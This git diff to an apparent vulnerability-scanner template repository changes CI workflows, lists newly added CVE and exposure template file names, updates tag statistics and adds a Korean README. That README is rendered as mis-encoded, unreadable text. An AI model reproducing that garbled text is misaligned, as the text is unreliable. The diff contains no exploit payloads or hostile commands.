diff --git a/.github/ISSUE_TEMPLATE/new-template.md b/.github/ISSUE_TEMPLATE/new-template.md
new file mode 100644
index 0000000000..428b440e80
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/new-template.md
@@ -0,0 +1,17 @@
+---
+name: Template Request
+about: 'request for new template to be created.'
+labels: 'new-template'
+
+---
+
+
+
+
+### Template for?
+
+
+
+### Details:
+
+
\ No newline at end of file
diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml
new file mode 100644
index 0000000000..0cdd8e99f5
--- /dev/null
+++ b/.github/workflows/cache-purge.yml
@@ -0,0 +1,18 @@
+name: ๐๏ธ Cache Purge
+
+on:
+ push:
+ tags:
+ - '*'
+ workflow_dispatch:
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Purge cache
+ uses: jakejarvis/cloudflare-purge-action@master
+ env:
+ CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
+ CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
+# PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'
\ No newline at end of file
diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml
index 1253309751..9bc55c6447 100644
--- a/.github/workflows/cve-annotate.yml
+++ b/.github/workflows/cve-annotate.yml
@@ -29,7 +29,7 @@ jobs:
- name: Generate CVE Annotations
id: cve-annotate
run: |
- cve-annotate -i ./cves/ -d .
+ cve-annotate -i . -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml
index 4107c2edcc..bab829208b 100644
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@@ -25,5 +25,5 @@ jobs:
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
- nuclei -validate -t .
+ nuclei -validate
nuclei -validate -w ./workflows
\ No newline at end of file
diff --git a/.new-additions b/.new-additions
index 82aef81f32..1c8a13aa94 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,9 +1,35 @@
-cnvd/2020/CNVD-2020-46552.yaml
-cves/2021/CVE-2021-20123.yaml
-cves/2021/CVE-2021-20124.yaml
-cves/2021/CVE-2021-25075.yaml
-cves/2022/CVE-2022-30489.yaml
-misconfiguration/unauth-wavink-panel.yaml
-technologies/kubernetes-operational-view-detect.yaml
-vulnerabilities/wordpress/seo-redirection-xss.yaml
-workflows/yonyou-nc-workflow.yaml
+cnvd/2022/CNVD-2022-42853.yaml
+cves/2014/CVE-2014-8676.yaml
+cves/2015/CVE-2015-7245.yaml
+cves/2018/CVE-2018-16139.yaml
+cves/2020/CVE-2020-13258.yaml
+cves/2021/CVE-2021-35380.yaml
+cves/2021/CVE-2021-42663.yaml
+cves/2021/CVE-2021-42667.yaml
+cves/2022/CVE-2022-2376.yaml
+cves/2022/CVE-2022-23854.yaml
+cves/2022/CVE-2022-29004.yaml
+cves/2022/CVE-2022-29005.yaml
+cves/2022/CVE-2022-31474.yaml
+cves/2022/CVE-2022-35405.yaml
+cves/2022/CVE-2022-36642.yaml
+cves/2022/CVE-2022-37299.yaml
+cves/2022/CVE-2022-38794.yaml
+default-logins/3com/3com-nj2000-default-login.yaml
+exposed-panels/appsmith-web-login.yaml
+exposed-panels/ccm-detect.yaml
+exposed-panels/corebos-panel.yaml
+exposed-panels/cvent-panel-detect.yaml
+exposed-panels/omniampx-panel.yaml
+exposed-panels/v2924-admin-panel.yaml
+exposures/logs/redis-exception-error.yaml
+exposures/logs/webalizer-xtended-stats.yaml
+misconfiguration/aws-xray-application.yaml
+misconfiguration/corebos-htaccess.yaml
+misconfiguration/ec2-instance-information.yaml
+misconfiguration/graphql/graphql-playground.yaml
+misconfiguration/hivequeue-agent.yaml
+misconfiguration/server-status.yaml
+technologies/jhipster-detect.yaml
+technologies/openssl-detect.yaml
+vulnerabilities/videoxpert-lfi.yaml
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 832ecac550..31dc7b597f 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -3,6 +3,11 @@
#
# This is default list of tags and files to excluded from default nuclei scan.
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
+#
+# ============ DO NOT EDIT ============
+# Automatically updated by nuclei on execution from nuclei-templates
+# User changes should be in nuclei config file
+# ============ DO NOT EDIT ============
# tags is a list of tags to ignore execution for
# unless asked for by the user.
diff --git a/README.md b/README.md
index 8026d4b3ab..751233d987 100644
--- a/README.md
+++ b/README.md
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
-| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
-| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
-| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
-| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
-| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
-| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
-| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
-| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
-| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
+| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
+| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
+| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
+| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
+| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
+| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
+| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
+| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
+| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
+| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
-**261 directories, 3543 files**.
+**296 directories, 4231 files**.
diff --git a/README_KR.md b/README_KR.md
new file mode 100644
index 0000000000..8bf4ba4257
--- /dev/null
+++ b/README_KR.md
@@ -0,0 +1,96 @@
+
+
+
+Nuclei ํ
ํ๋ฆฟ
+
+์ปค๋ฎค๋ํฐ์์ ์์ ํ, ์ ํ๋ฆฌ์ผ์ด์
๋ณด์ ์ทจ์ฝ์ ์ ์ฐพ๊ธฐ ์ํ Nuclei ์์ง์ฉ ํ
ํ๋ฆฟ ๋ชฉ๋ก
+
+
+
+
+
+
+
+
+
+
+ ๊ฐ์ด๋ ๋ฌธ์ โข
+ ๊ธฐ์ฌ โข
+ ๋
ผ์ โข
+ ์ปค๋ฎค๋ํฐ โข
+ FAQs โข
+ ๋์ค์ฝ๋
+
+
+
+ English โข
+ ํ๊ตญ์ด
+
+
+----
+
+ํ
ํ๋ฆฟ์ ์ค์ ์ค์บ๋ ์์ง์ ๋์ํ๊ฒ ํ๋ [nuclei scanner](https://github.com/projectdiscovery/nuclei)์ ํต์ฌ์
๋๋ค.
+์ด ์ ์ฅ์๋ ์ฐ๋ฆฌ ํ์์ ์ ๊ณตํ๊ฑฐ๋, ์ปค๋ฎค๋ํฐ์์ ๊ธฐ์ฌํ ๋ค์ํ ํ
ํ๋ฆฟ๋ค์ ์ ์ฅํ๊ณ ๋ณด๊ดํฉ๋๋ค.
+ํ
ํ๋ฆฟ ๋ชฉ๋ก์ ์ฆ๊ฐ์ํค๊ธฐ ์ํด์ **pull requests** ๋ [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) ๋ฅผ ํตํด ๊ธฐ์ฌํด์ฃผ์๊ธฐ๋ฅผ ๋ถํ๋๋ฆฝ๋๋ค.
+
+## Nuclei ํ
ํ๋ฆฟ ๊ฐ์
+
+๊ณ ์ ํ๊ทธ, ์์ฑ์, ๋๋ ํ ๋ฆฌ, ์ฌ๊ฐ๋, ํ
ํ๋ฆฟ ์ข
๋ฅ์ ๋ํ ํต๊ณ๋ฅผ ํฌํจํ๊ณ ์๋ nuclei ํ
ํ๋ฆฟ์ ๊ฐ์์
๋๋ค. ์๋ ํ๋ ๊ฐ ์งํ์ ์์ 10๊ฐ ํญ๋ชฉ์ ๋ํ๋ด๊ณ ์์ต๋๋ค. ๋ ์์ธํ ์ ๋ณด๋ [์ด๊ณณ](TEMPLATES-STATS.md)์์ ํ์ธ ๊ฐ๋ฅํ๊ณ , [JSON](TEMPLATES-STATS.json) ํ์์ผ๋ก๋ ํ์ธ ๊ฐ๋ฅํฉ๋๋ค.
+
+
+
+
+
+## Nuclei ํ
ํ๋ฆฟ ํต๊ณ Top 10
+
+| ํ๊ทธ | ๊ฐ์ | ์์ฑ์ | ๊ฐ์ | ๋๋ ํ ๋ฆฌ | ๊ฐ์ | ์ฌ๊ฐ๋ | ๊ฐ์ | ์ข
๋ฅ | ๊ฐ์ |
+|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
+| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
+| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
+| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
+| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
+| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
+| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
+| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
+| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
+| tech | 286 | gy741 | 126 | file | 76 | | | | |
+
+**286๊ฐ ๋๋ ํ ๋ฆฌ, 4012๊ฐ ํ์ผ**.
+
+ |
+
+
+
+๐ ๋ฌธ์
+-----
+
+์ ํ
ํ๋ฆฟ์ด๋ ์ฌ์ฉ์ ์ ์ ํ
ํ๋ฆฟ์ ๋น๋ํ๊ธฐ ์ํ ์์ธํ ๋ฌธ์๋ https://nuclei.projectdiscovery.io ์์ ํ์ธํ ์ ์์ต๋๋ค. ์์
๋ฐฉ์์ ์ดํด๋ฅผ ๋๊ธฐ ์ํ ํ
ํ๋ฆฟ๋ค๋ ์์ต๋๋ค.
+
+๐ช ๊ธฐ์ฌ
+-----
+
+Nuclei ํ
ํ๋ฆฟ์ ์ปค๋ฎค๋ํฐ์ ๊ธฐ์ฌ๋ก ๋์ํฉ๋๋ค.
+[ํ
ํ๋ฆฟ ๊ธฐ์ฌ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [๊ธฐ๋ฅ ์์ฒญ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [๋ฒ๊ทธ ์ ๋ณด](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)๋ ์ธ์ ๋ ์ง ํ์ํฉ๋๋ค.
+
+![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
+
+๐ฌ ๋
ผ์
+-----
+
+๊ฐ์ด ์ด์ผ๊ธฐํ๊ณ ์ถ์ ์ง๋ฌธ, ์๋ฌธ ํน์ ์์ด๋์ด๊ฐ ์์ผ์ ๊ฐ์?
+[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) ์์ ์์ ๋กญ๊ฒ ์์ํ ์ ์์ต๋๋ค.
+
+๐จโ๐ป ์ปค๋ฎค๋ํฐ
+-----
+
+ํ๋ก์ ํธ ๊ด๋ฆฌ์์ ์ง์ ๋
ผ์ํ๊ณ ๋ณด์๊ณผ ์๋ํ ๊ด๋ จ ์ฌํญ์ ๋ค๋ฅธ ์ฌ๋๊ณผ ๊ณต์ ํ๊ธฐ ์ํด [Discord Community](https://discord.gg/projectdiscovery) ์ ์ฐธ์ฌํ๋ ๊ฒ์ ํ์ํฉ๋๋ค. ์ถ๊ฐ๋ก Nuclei ์ ๋ํ ๋ชจ๋ ์ ๋ณด๋ฅผ ์
๋ฐ์ดํธ ํ๊ธฐ ์ํด [ํธ์ํฐ](https://twitter.com/pdnuclei) ํ๋ก์ฐ๋ฅผ ํ ์ ์์ต๋๋ค.
+
+
+
+
+
+
+
+์ฌ๋ฌ๋ถ์ ๊ธฐ์ฌ์ ์ปค๋ฎค๋ํฐ์ ํ์ฑํ๋ฅผ ์ํ ๋
ธ๋ ฅ์ ๋ค์ํ๋ฒ ๊ฐ์ฌ๋๋ฆฝ๋๋ค.
+:heart:
diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index 649fb65dc0..beae7d1561 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@
-{"tags":[{"name":"cve","count":1156},{"name":"panel","count":515},{"name":"lfi","count":461},{"name":"xss","count":367},{"name":"wordpress","count":364},{"name":"exposure","count":293},{"name":"rce","count":291},{"name":"cve2021","count":283},{"name":"tech","count":271},{"name":"wp-plugin","count":264},{"name":"cve2020","count":197},{"name":"","count":188},{"name":"token-spray","count":154},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":121},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":110},{"name":"unauth","count":108},{"name":"iot","count":102},{"name":"oast","count":97},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":71},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"cve2022","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":61},{"name":"file","count":60},{"name":"wp","count":55},{"name":"network","count":53},{"name":"router","count":52},{"name":"oracle","count":50},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"auth-bypass","count":39},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":26},{"name":"kubernetes","count":25},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"springboot","count":24},{"name":"oss","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"microsoft","count":21},{"name":"debug","count":21},{"name":"intrusive","count":21},{"name":"misc","count":21},{"name":"vmware","count":21},{"name":"aem","count":21},{"name":"wp-theme","count":20},{"name":"service","count":20},{"name":"fuzz","count":20},{"name":"manageengine","count":19},{"name":"cve2012","count":19},{"name":"dns","count":18},{"name":"zoho","count":18},{"name":"php","count":18},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"deserialization","count":17},{"name":"weblogic","count":17},{"name":"struts","count":16},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"dlink","count":15},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"api","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"cve2009","count":14},{"name":"fileupload","count":14},{"name":"hp","count":14},{"name":"xxe","count":14},{"name":"firewall","count":13},{"name":"camera","count":13},{"name":"ruijie","count":13},{"name":"status","count":12},{"name":"nginx","count":12},{"name":"rails","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"lfr","count":12},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"cnvd2021","count":11},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"grafana","count":10},{"name":"coldfusion","count":10},{"name":"glpi","count":10},{"name":"fortigate","count":10},{"name":"dell","count":10},{"name":"backup","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"auth","count":10},{"name":"airflow","count":10},{"name":"woocommerce","count":9},{"name":"fastjson","count":9},{"name":"iis","count":9},{"name":"fortinet","count":9},{"name":"drupal","count":9},{"name":"zabbix","count":9},{"name":"mirai","count":9},{"name":"cve2008","count":9},{"name":"jndi","count":9},{"name":"ftp","count":9},{"name":"github","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"laravel","count":9},{"name":"wso2","count":9},{"name":"bypass","count":8},{"name":"audit","count":8},{"name":"metadata","count":8},{"name":"phpmyadmin","count":8},{"name":"vcenter","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"zyxel","count":8},{"name":"amazon","count":8},{"name":"citrix","count":8},{"name":"prometheus","count":8},{"name":"blind","count":8},{"name":"django","count":8},{"name":"azure","count":8},{"name":"scada","count":8},{"name":"firebase","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"python","count":7},{"name":"rconfig","count":7},{"name":"elasticsearch","count":7},{"name":"kube","count":7},{"name":"sonicwall","count":7},{"name":"ssti","count":7},{"name":"mail","count":7},{"name":"exchange","count":7},{"name":"kafka","count":7},{"name":"files","count":7},{"name":"vpn","count":7},{"name":"bucket","count":7},{"name":"docker","count":6},{"name":"cobbler","count":6},{"name":"sitecore","count":6},{"name":"jetty","count":6},{"name":"fpd","count":6},{"name":"nodejs","count":6},{"name":"ofbiz","count":6},{"name":"druid","count":6},{"name":"dedecms","count":6},{"name":"crlf","count":6},{"name":"backdoor","count":6},{"name":"magmi","count":6},{"name":"jboss","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"huawei","count":6},{"name":"headless","count":6},{"name":"zimbra","count":6},{"name":"lucee","count":6},{"name":"firmware","count":6},{"name":"bigip","count":6},{"name":"cicd","count":6},{"name":"go","count":6},{"name":"ecology","count":6},{"name":"cnvd2020","count":6},{"name":"setup","count":5},{"name":"cache","count":5},{"name":"kubelet","count":5},{"name":"thinkphp","count":5},{"name":"opensis","count":5},{"name":"artica","count":5},{"name":"circarlife","count":5},{"name":"symantec","count":5},{"name":"apisix","count":5},{"name":"moodle","count":5},{"name":"node","count":5},{"name":"gocd","count":5},{"name":"minio","count":5},{"name":"rseenet","count":5},{"name":"alibaba","count":5},{"name":"microweber","count":5},{"name":"error","count":5},{"name":"ssl","count":5},{"name":"rfi","count":5},{"name":"metinfo","count":5},{"name":"zhiyuan","count":5},{"name":"icewarp","count":5},{"name":"leak","count":5},{"name":"git","count":5},{"name":"strapi","count":5},{"name":"solarwinds","count":5},{"name":"keycloak","count":5},{"name":"fatpipe","count":5},{"name":"symfony","count":5},{"name":"ruby","count":5},{"name":"storage","count":5},{"name":"samsung","count":5},{"name":"photo","count":4},{"name":"cve2007","count":4},{"name":"oa","count":4},{"name":"terramaster","count":4},{"name":"ognl","count":4},{"name":"websphere","count":4},{"name":"buffalo","count":4},{"name":"nexus","count":4},{"name":"kevinlab","count":4},{"name":"sophos","count":4},{"name":"ssh","count":4},{"name":"resin","count":4},{"name":"cacti","count":4},{"name":"plesk","count":4},{"name":"elastic","count":4},{"name":"search","count":4},{"name":"jellyfin","count":4},{"name":"hongdian","count":4},{"name":"asp","count":4},{"name":"cloud","count":4},{"name":"hpe","count":4},{"name":"wcs","count":4},{"name":"paypal","count":4},{"name":"hoteldruid","count":4},{"name":"panos","count":4},{"name":"gogs","count":4},{"name":"cockpit","count":4},{"name":"aspose","count":4},{"name":"couchdb","count":4},{"name":"caucho","count":4},{"name":"tikiwiki","count":4},{"name":"artifactory","count":4},{"name":"flink","count":4},{"name":"mailchimp","count":4},{"name":"microstrategy","count":4},{"name":"sonarqube","count":4},{"name":"springcloud","count":4},{"name":"kibana","count":4},{"name":"prestashop","count":4},{"name":"hikvision","count":4},{"name":"thinkcmf","count":4},{"name":"db","count":4},{"name":"adminer","count":4},{"name":"voip","count":4},{"name":"activemq","count":4},{"name":"puppet","count":4},{"name":"smtp","count":4},{"name":"stripe","count":4},{"name":"awstats","count":4},{"name":"cnvd2019","count":4},{"name":"jetbrains","count":4},{"name":"beyondtrust","count":4},{"name":"npm","count":4},{"name":"xmlrpc","count":4},{"name":"mongodb","count":4},{"name":"sugarcrm","count":3},{"name":"voipmonitor","count":3},{"name":"kingsoft","count":3},{"name":"rlm","count":3},{"name":"synology","count":3},{"name":"httpbin","count":3},{"name":"seagate","count":3},{"name":"facebook","count":3},{"name":"lansweeper","count":3},{"name":"jeesns","count":3},{"name":"jfrog","count":3},{"name":"thinfinity","count":3},{"name":"openssh","count":3},{"name":"linkedin","count":3},{"name":"workspaceone","count":3},{"name":"javascript","count":3},{"name":"circleci","count":3},{"name":"smb","count":3},{"name":"axis","count":3},{"name":"ampps","count":3},{"name":"ebs","count":3},{"name":"sql","count":3},{"name":"umbraco","count":3},{"name":"log","count":3},{"name":"globalprotect","count":3},{"name":"empirecms","count":3},{"name":"telerik","count":3},{"name":"seeyon","count":3},{"name":"openbmcs","count":3},{"name":"postmessage","count":3},{"name":"oauth","count":3},{"name":"openam","count":3},{"name":"lotus","count":3},{"name":"zeroshell","count":3},{"name":"netlify","count":3},{"name":"square","count":3},{"name":"bruteforce","count":3},{"name":"linksys","count":3},{"name":"heroku","count":3},{"name":"concrete","count":3},{"name":"linkerd","count":3},{"name":"cloudflare","count":3},{"name":"samba","count":3},{"name":"bitrix","count":3},{"name":"horizon","count":3},{"name":"fortios","count":3},{"name":"modem","count":3},{"name":"aptus","count":3},{"name":"sharepoint","count":3},{"name":"consul","count":3},{"name":"3cx","count":3},{"name":"database","count":3},{"name":"jamf","count":3},{"name":"elfinder","count":3},{"name":"mcafee","count":3},{"name":"redis","count":3},{"name":"prtg","count":3},{"name":"glassfish","count":3},{"name":"movable","count":3},{"name":"kentico","count":3},{"name":"cisa","count":3},{"name":"ems","count":3},{"name":"messaging","count":3},{"name":"dos","count":3},{"name":"targa","count":3},{"name":"graph","count":3},{"name":"hashicorp","count":3},{"name":"vbulletin","count":3},{"name":"centos","count":3},{"name":"geowebserver","count":3},{"name":"phpinfo","count":3},{"name":"splunk","count":3},{"name":"phppgadmin","count":3},{"name":"mongo","count":3},{"name":"wordfence","count":3},{"name":"odoo","count":3},{"name":"axis2","count":3},{"name":"webadmin","count":3},{"name":"nacos","count":3},{"name":"httpd","count":3},{"name":"nosqli","count":3},{"name":"panabit","count":3},{"name":"subrion","count":3},{"name":"actuator","count":3},{"name":"vrealize","count":3},{"name":"epson","count":3},{"name":"dreambox","count":3},{"name":"pentaho","count":3},{"name":"trendnet","count":3},{"name":"openemr","count":3},{"name":"dolibarr","count":3},{"name":"sendgrid","count":3},{"name":"nuuo","count":3},{"name":"axigen","count":3},{"name":"fanruan","count":3},{"name":"grav","count":3},{"name":"exposures","count":3},{"name":"trixbox","count":3},{"name":"selea","count":3},{"name":"fuelcms","count":3},{"name":"saltstack","count":2},{"name":"akamai","count":2},{"name":"tenda","count":2},{"name":"horde","count":2},{"name":"code42","count":2},{"name":"favicon","count":2},{"name":"nasos","count":2},{"name":"netsus","count":2},{"name":"accela","count":2},{"name":"zerof","count":2},{"name":"exacqvision","count":2},{"name":"dotnetnuke","count":2},{"name":"rackstation","count":2},{"name":"craftcms","count":2},{"name":"zte","count":2},{"name":"fortimail","count":2},{"name":"frontpage","count":2},{"name":"pacsone","count":2},{"name":"nextcloud","count":2},{"name":"gitbook","count":2},{"name":"nagios","count":2},{"name":"mantisbt","count":2},{"name":"orchid","count":2},{"name":"javamelody","count":2},{"name":"alfresco","count":2},{"name":"emqx","count":2},{"name":"virtualui","count":2},{"name":"pfsense","count":2},{"name":"maian","count":2},{"name":"password","count":2},{"name":"ericsson","count":2},{"name":"resourcespace","count":2},{"name":"avaya","count":2},{"name":"webcam","count":2},{"name":"mysql","count":2},{"name":"mailgun","count":2},{"name":"dynamicweb","count":2},{"name":"text","count":2},{"name":"natshell","count":2},{"name":"rancher","count":2},{"name":"checkpoint","count":2},{"name":"bitly","count":2},{"name":"ilo","count":2},{"name":"labkey","count":2},{"name":"seowon","count":2},{"name":"harbor","count":2},{"name":"mida","count":2},{"name":"rocketchat","count":2},{"name":"waf","count":2},{"name":"influxdb","count":2},{"name":"dvwa","count":2},{"name":"pam","count":2},{"name":"servicenow","count":2},{"name":"jsf","count":2},{"name":"apollo","count":2},{"name":"sangfor","count":2},{"name":"redash","count":2},{"name":"guacamole","count":2},{"name":"idea","count":2},{"name":"bigant","count":2},{"name":"nextjs","count":2},{"name":"tidb","count":2},{"name":"openstack","count":2},{"name":"ansible","count":2},{"name":"dotcms","count":2},{"name":"sysaid","count":2},{"name":"metersphere","count":2},{"name":"aruba","count":2},{"name":"netdata","count":2},{"name":"jeedom","count":2},{"name":"supermicro","count":2},{"name":"ucmdb","count":2},{"name":"myfactory","count":2},{"name":"justwriting","count":2},{"name":"seeddms","count":2},{"name":"rackn","count":2},{"name":"thruk","count":2},{"name":"gradle","count":2},{"name":"lantronix","count":2},{"name":"neos","count":2},{"name":"domxss","count":2},{"name":"places","count":2},{"name":"casdoor","count":2},{"name":"key","count":2},{"name":"owasp","count":2},{"name":"cocoon","count":2},{"name":"chyrp","count":2},{"name":"couchbase","count":2},{"name":"tableau","count":2},{"name":"s3","count":2},{"name":"avantfax","count":2},{"name":"getsimple","count":2},{"name":"liferay","count":2},{"name":"csrf","count":2},{"name":"avtech","count":2},{"name":"netis","count":2},{"name":"phpstorm","count":2},{"name":"flightpath","count":2},{"name":"shellshock","count":2},{"name":"rosariosis","count":2},{"name":"typo3","count":2},{"name":"akkadian","count":2},{"name":"phpshowtime","count":2},{"name":"sequoiadb","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"wamp","count":2},{"name":"sentry","count":2},{"name":"octoprint","count":2},{"name":"appcms","count":2},{"name":"ruckus","count":2},{"name":"phpcollab","count":2},{"name":"pbootcms","count":2},{"name":"ixcache","count":2},{"name":"f5","count":2},{"name":"flir","count":2},{"name":"ranger","count":2},{"name":"erxes","count":2},{"name":"terraform","count":2},{"name":"viewpoint","count":2},{"name":"qihang","count":2},{"name":"middleware","count":2},{"name":"kiwitcms","count":2},{"name":"bigbluebutton","count":2},{"name":"cve2005","count":2},{"name":"webmin","count":2},{"name":"gitea","count":2},{"name":"globaldomains","count":2},{"name":"impresscms","count":2},{"name":"openwrt","count":2},{"name":"bomgar","count":2},{"name":"tongda","count":2},{"name":"weather","count":2},{"name":"wuzhicms","count":2},{"name":"yapi","count":2},{"name":"jquery","count":2},{"name":"apereo","count":2},{"name":"twitter","count":2},{"name":"alienvault","count":2},{"name":"detect","count":2},{"name":"proftpd","count":2},{"name":"totemomail","count":2},{"name":"listserv","count":2},{"name":"wooyun","count":2},{"name":"dubbo","count":2},{"name":"chiyu","count":2},{"name":"ovirt","count":2},{"name":"ebook","count":2},{"name":"gnuboard","count":2},{"name":"digitalrebar","count":2},{"name":"sqlite","count":2},{"name":"payara","count":2},{"name":"electron","count":2},{"name":"openfire","count":2},{"name":"tileserver","count":2},{"name":"cve2006","count":2},{"name":"xweb500","count":2},{"name":"node-red-dashboard","count":2},{"name":"swagger","count":2},{"name":"jmx","count":2},{"name":"commax","count":2},{"name":"hasura","count":2},{"name":"versa","count":2},{"name":"docs","count":2},{"name":"linux","count":2},{"name":"ambari","count":2},{"name":"pega","count":2},{"name":"graphite","count":2},{"name":"yii","count":2},{"name":"gophish","count":2},{"name":"metabase","count":2},{"name":"gespage","count":2},{"name":"kafdrop","count":2},{"name":"ametys","count":2},{"name":"glances","count":2},{"name":"hjtcloud","count":2},{"name":"lighttpd","count":2},{"name":"embed","count":2},{"name":"sidekiq","count":2},{"name":"intercom","count":2},{"name":"ec2","count":2},{"name":"livezilla","count":2},{"name":"auerswald","count":2},{"name":"codeigniter","count":2},{"name":"ghost","count":2},{"name":"ecoa","count":2},{"name":"traefik","count":2},{"name":"iptime","count":2},{"name":"rabbitmq","count":2},{"name":"emerge","count":2},{"name":"mbean","count":2},{"name":"cyberoam","count":2},{"name":"cas","count":2},{"name":"rockmongo","count":2},{"name":"pgadmin","count":2},{"name":"ad","count":2},{"name":"intellian","count":2},{"name":"forcepoint","count":2},{"name":"hadoop","count":2},{"name":"otobo","count":2},{"name":"xerox","count":2},{"name":"shenyu","count":2},{"name":"hubspot","count":2},{"name":"frp","count":2},{"name":"aviatrix","count":2},{"name":"netscaler","count":2},{"name":"openvpn","count":2},{"name":"acrolinx","count":2},{"name":"netflix","count":2},{"name":"igs","count":2},{"name":"mobileiron","count":2},{"name":"spark","count":2},{"name":"qcubed","count":2},{"name":"plastic","count":2},{"name":"matrix","count":2},{"name":"circontrol","count":2},{"name":"chamilo","count":2},{"name":"airtame","count":2},{"name":"rstudio","count":2},{"name":"itop","count":2},{"name":"conductor","count":2},{"name":"zzzcms","count":2},{"name":"xxljob","count":2},{"name":"arcgis","count":2},{"name":"azkaban","count":2},{"name":"tapestry","count":2},{"name":"hostheader-injection","count":2},{"name":"sdwan","count":2},{"name":"gitlist","count":2},{"name":"filemanager","count":2},{"name":"skycaiji","count":2},{"name":"projectsend","count":2},{"name":"clusterengine","count":2},{"name":"zblogphp","count":2},{"name":"backups","count":2},{"name":"seacms","count":2},{"name":"fortiweb","count":